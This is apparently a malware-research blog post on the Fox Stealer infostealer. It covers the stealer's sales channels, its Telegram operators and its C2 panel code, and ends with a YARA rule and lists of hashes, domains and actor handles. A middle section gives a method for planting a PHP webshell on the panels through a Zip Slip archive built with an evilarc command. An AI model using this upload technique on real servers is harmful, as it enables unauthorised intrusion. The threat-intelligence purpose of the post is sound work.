Threat: Fox Stealer, the Russian Telegram skid army



About a month ago my crawler found what seemeed to be a command & control panel that I had never seen before. After researching it I couldn't find any information about it and it seemed different than other foxed themed malwares such has Diamond Fox or Pony Forx. I had questions such has where does this came from? Where is it sold? What does it do?
This article covers my findings and the answer to all of the above.
I haven't analyzed the binary since I'm not really interested to know how it does what I know it does. But if that's your jam you'll find some hashes at the end of this article.

After finding the first panel I tailored my crawler to look for similar panels. Quickly I realized there was 2 versions going around, one had a blue theme and the other one was orange. The orange version seemed a bit more elaborate:



The orange version displays a screenshot and AutoFill data


In the Settings page we can see some differences:

The orange version has some more functionalities:
  • NoSNG
  • WebCam capture
  • Max file size



After a bit of OSINT I found the source code of both panels.
The blue version was called panel_v0_1.zip and the orange version panelv0_2.zip. Note that there is also a Russian version going around which has hardcored Russian strings.

Communication channel

Sales of this malware debuted on january 29 on the lolzteam forum in the "private software" category (hxxps://lolzteam.net/threads/784753/). 
Price: 600 rubles, 200 rubles for "rebinding".
On april 15th, the actor closed the sales on lolzteam:



They operate mostly through Telegram in an invite only group.
Favorite activities include bragging about getting victim's picture from their webcam, posting memes and anime girls.

Actor "Phust" bragging about getting a victim's webcam picture


Some actors aren't shy at all and don't hesitate to post voice messages.  Here's your classical "blyad" voice message:


What does the fox says ?




There is no typical builder for this, which is a trend that I'm seing a more and more these days . Instead, each clients has access to a private telegram bot from where they can generate new builds and recieve logs from victims:




And finally there is a third channel created by actor @foo0x that regulary post updates about the product.
This is all the telegra.ph links posted in this channel:

Clients are asked to use http://enothost.ru for hosting which definitely looks like a fishy hosting provider...

One actor got compromised by a lousy hacker and found a php webshell on his webserver then asked  on telegram "Это кино такое?" Which translates to "is this a movie?" Eventually someone told him it was a shell...




2 hours later an update was published to mitigate the vulnerability:


Source Code Analysis (Server Side)

While analyzing the source code it was clear there was some obvious cross site scripting vulnerabilites due to the victim's input being reflected with no validation from neither the client or the server side. That would allow an attacker to steal the cookies of the actor while he's logged into the c2 by crafting and sending a XSS payload to the c2

Most importantly, there was also no validation when recieving the zip file containing the stolen data from the victim. If an attacker sends a zip file containing a bunch of files to the panel on post.php, it will be  unziped and stored in the webserver directory like this: foxc2.tld/logs/randomID/attackerFiles.
This is the code responsible for this:


if(isset($_POST['upload']))
{
 if(isset($_FILES))
 {
  if($_FILES['files']['error'] > 0)
   $err[] = $errUpload[$_FILES['files']['error']];

  if(empty($err))
  {
   $randint = mt_rand(100000000,999999999);
   $type = pathinfo($_FILES['files']['name']);   
   mkdir("logs/".$randint,0777);
   $name = "/logs/".$randint."/".$randint.".zip";
   move_uploaded_file($_FILES['files']['tmp_name'], __DIR__ . $name);
   require_once('pclzip.lib.php');
   $archive = new PclZip("logs/".$randint."/".$randint.".zip");
   $archive->extract(PCLZIP_OPT_PATH, "logs/".$randint."/");

...

By the look of this, an attacker can upload a php webshell there.
The problem is that the shell will be located in logs/randomID and there's no way to know this ID unless you are already logged into the panel and are looking at the browser console or have access to the database...
Fortunately, the library used for unzipping the file is vulnerable to Zip Slip. Basically what needs to be done is creating a zip file which contains a folder named ".." which itself contains the php shell.
When the zip file is unzipped, the ".." is interpreted and the shell will jump back from one directory and land in /logs instead of /logs/randID.
You can generate a payload using the evilarc tool like this:


python2 evilarc.py -f out.zip -d 1 -o unix payload.php

For a more stealthy payload it's a good idea to fill the zip file with "legit" data such has screenshot, password list etc. Making a request on post.php with the right parameters will have for effect to create a new row in the panel (and send the data over Telegram if that setting is enabled).
A proper zip payload would look like this:



Voilà ¯\_(ツ)_/¯, after sending the zip through a form on post.php, the webshell will be located on c2.com/logs/shell.php (only do this on localhost of course).

As I mentioned earlier, 2 weeks ago a patch was released to mitigate the vulnerabilities. Here's what changed in the code.
They are now using some regular expressions to validate POST parameters:

if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['p']))
    $_POST['p'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['c']))
    $_POST['c'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['f']))
    $_POST['f'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['a']))
    $_POST['a'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['b']))
    $_POST['b'] = 0;

And most importantly they are now using the PCLZIP_OPT_BY_NAME argument which will only allows files to be extracted if their names are known by the server...

$files_ext[0] = "Password.txt";
$files_ext[1] = "screenshot.jpeg";
$archive->extract(PCLZIP_OPT_BY_NAME, $files_ext,PCLZIP_OPT_PATH,"logs/".$randint."/");

( ͡° ͜ʖ ͡°)

Yara rule:
rule Fox_Stealer
{
    meta:
        description = "Fox_Stealer"
        author = "MisterCh0c"
        reference = "c6ab8c6b8c56b4d79372f00d6b2db0bcd2d0d7dfaaca577fcfbc1b3dec1a5d57"
        date = "2019/04"
        maltype = "Stealer"
 
    strings:
        $string1 = "cn=%s&b=%s&d=%s&dis=%s&t=%s&f=%s&bss=%s&s=%s&i=%s&scr=%s&avm=%s&aav=%s&ar=%s&lod=%s&sc=%s&ns=%s&ms=%s&form=%s"
 
    condition:
        uint16(0) == 0x5A4D and all of ($string*)
}


Bonus:
A custom panel  is standing out by it's design.
hxx://battlecash.ru
424a0c1df47c6b72849a2a57cdd30d501bb9badfe4f6e38f713799094933e030
d5ccebd39913649d505cd3efc7ba4c1aa8597c8fddf5fdaaf08ea2a91c5792a6





Intelligence / IOC

Description: Panel_v0_1.zip
MD5: ebcf2dcd7a462f46b984b7d79407838f
SHA-1: e4c3fe115566edd81de1f2cc1cdfa11ac554a0e8
Size: 3.82 MB
File Type:ZIP

Description: Panel_v0_2.zip
MD5: de8c30181fd26d0f1f9a8f803244b2dd
SHA-1: aa6690f954732a650c81c29b0cec9d5ff30ff46a
SHA-256: 940d516d887d64e73358bb6e2708695280c21076e500627bec785fda99aae73d
Size: 3.86 MB
File Type: ZIP

Description: Fixed Post.php
MD5: a377f87b9471e77b84a0045970b5bb85
SHA-1: c22f68099e8bfe6d95e353ab2e551eec78afeb43
SHA-256: 78e5eb48acbd03ff64c99011f66c0ce7b7cd5b8d6c61277787aded817f303efd
Size: 3.44 KB
File Type: PHP



Bins:
945e198a30a7cf612271afbb29fcb334428d2d34571a155b937640d2cf1ea4ef
1d128baa4da37a652a1593eb1b1461b26d0347cbe237f279ba1afaa584790257
0f57951cd42bba6ed5d1928777fabb1785057204474e24994876be87a83b22dc
0ec99f83cf734192761b2c889ca3850eec15498990279c9babb8af0480ad39c2
40b632b8726626b61b0644060da5aaf2deb2b888aa07a760ada2b6617827e50d
da28588629f2de6fcd4077642d29c6478bd6174d7507866fef67e9a4a2b89fe2
3c2c0af04c346105a0b9e57e8d3e3057462c1f4aa79771378b3fc681708bf98c
a68d978129be2752ea7ac0ea739fe382cd97e2dc0cbc7a669225df690cc196e3
ccf10450b5485fad8290fbf74fd55579eada27680d3330aea60ea5d578c5235e
99695fcbe6fac6004fca0b9c8be22abbaa46d0edeb5f149b9d6e01924f3b64d7
ae2df64c6544dc71e35415524d0b3ab845329d7c87c6d614f9dd5c0aafd31bec

Panels (47) 

  • hxxp://a0287829.xsph.ru
  • hxxp://androsha.ga
  • hxxp://anticap.ml
  • hxxp://ark-steal-free.tk
  • hxxp://battlecash.ru
  • hxxp://blackspace.site
  • hxxp://bigbosslike.tk/
  • hxxp://bloodborn.xyz
  • hxxp://bugtrackerjorkey.tk
  • hxxp://coderxz.site
  • hxxp://dexire.tk
  • hxxp://djimbosfan.tk
  • hxxp://docheat.site
  • hxxp://exchangepe.cf
  • hxxp://f0289264.xsph.ru
  • hxxp://foxpanel734923vbb2.tk
  • hxxp://gilork.ga
  • hxxp://govoting.site
  • hxxp://hjon1k21.tk
  • hxxp://hooksixteenth.tk
  • hxxp://jon1k2002.tk
  • hxxp://kuzya001.tk
  • hxxp://lexonlex31q.tk/login/
  • hxxp://lobsterkiller.tk
  • hxxp://lucasik.tk
  • hxxp://mrgrom.gq
  • hxxp://oldfuck.tk/login/
  • hxxp://orangemail.tk
  • hxxp://paketa.gq
  • hxxp://panelys.tk
  • hxxp://phust-adminpanel.ga
  • hxxp://poolground.tk
  • hxxp://reaper.tk
  • hxxp://rondylog1337.ga
  • hxxp://sashajeweler.tk
  • hxxp://schoolmosreg.tk
  • hxxp://squarez.icu
  • hxxp://squarez16.site
  • hxxp://stiller.tk
  • hxxp://test1331.tk
  • hxxp://webenginer.tk
  • hxxp://wnukz.site
  • hxxp://wsq22.ml
  • hxxp://yadaynksta.ga
  • hxxp://younglybae.tk
  • hxxp://younglybae.tk/login
  • hxxp://z1xrk.cf

Telegram (69)

Group:Fox Chat
  • @ANDROSHAyt
  • @Accacinka
  • @AntonioDeSpasito
  • @CopyRRR
  • @DarkVolk
  • @Echout
  • @Elecktro1337
  • @GgW000
  • @Hina9168
  • @Jon1k02
  • @LexQ31
  • @Ny_Ya
  • @Phust
  • @RiotExcuse
  • @SoX13
  • @SquarezLZT
  • @TBOU_KPUK
  • @Tchase
  • @TomAndersn
  • @VainbergVip
  • @VenerGG
  • @XPAKETAX
  • @aI1n04ka
  • @ak47andmannayakawa
  • @aliksiq
  • @allworm
  • @ampleev
  • @an1ik
  • @andrewcrazy
  • @andygars1a
  • @bagukan
  • @blood_borrn
  • @coldsteeze
  • @contello
  • @djimbosfan
  • @duffyrock
  • @dzeroz
  • @elecspaghett
  • @embley
  • @ernestop
  • @foo0x
  • @fortstoreoperator
  • @fristaylo
  • @fsbagent
  • @fyddi
  • @gen_aAAA
  • @glor123
  • @grifon314
  • @hopelessfuture
  • @invaiter
  • @itzlonique
  • @john_white7
  • @king10tts
  • @lomlock
  • @masusdez
  • @mrgromxyz
  • @neyklyzhiy
  • @staszon
  • @terratomorff
  • @thispills4me
  • @timoha2281337
  • @tot_samii_4el
  • @tropa72rus
  • @under_krypton1
  • @volfdem
  • @wipz_I
  • @wsq22
  • @xboom
  • @zaqqqqs


Comments

Post a Comment

Popular Posts